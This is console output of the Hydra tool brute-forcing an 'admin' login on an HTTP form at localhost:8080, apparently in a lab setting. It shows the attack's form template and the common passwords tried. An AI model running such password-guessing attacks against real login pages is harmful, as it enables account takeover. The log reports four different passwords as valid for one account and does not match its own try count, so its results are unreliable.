Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-15 15:42:56
[DATA] max 4 tasks per 1 server, overall 4 tasks, 5 login tries (l:1/p:5), ~2 tries per task
[DATA] attacking http-post-form://localhost:8080/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed
[ATTEMPT] target localhost - login "admin" - pass "123456" - 1 of 5 [child 0] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "admin" - 2 of 5 [child 1] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "password" - 3 of 5 [child 2] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "12345678" - 4 of 5 [child 3] (0/0)
[8080][http-post-form] host: localhost   login: admin   password: 123456
[8080][http-post-form] host: localhost   login: admin   password: admin
[8080][http-post-form] host: localhost   login: admin   password: password
[8080][http-post-form] host: localhost   login: admin   password: 12345678
1 of 1 target successfully completed, 4 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-15 15:42:57
